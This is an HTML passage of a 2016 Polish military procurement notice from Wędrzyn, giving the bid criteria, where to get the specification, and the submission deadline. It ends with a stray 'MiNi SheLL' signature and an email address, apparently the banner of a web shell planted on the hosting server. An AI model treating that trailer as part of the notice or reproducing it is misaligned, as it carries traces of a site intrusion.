<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.45wog.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 45 Wojskowy Oddział Gospodarczy w Wędrzynie, 69-211 Wędrzyn; bud. nr 33  pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.01.2016 godzina 11:45, miejsce: 45 Wojskowy Oddział Gospodarczy w Wędrzynie, 69-211 Wędrzyn; bud. nr 33   Kancelaria Jawna - II - piętro pokój nr 211.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com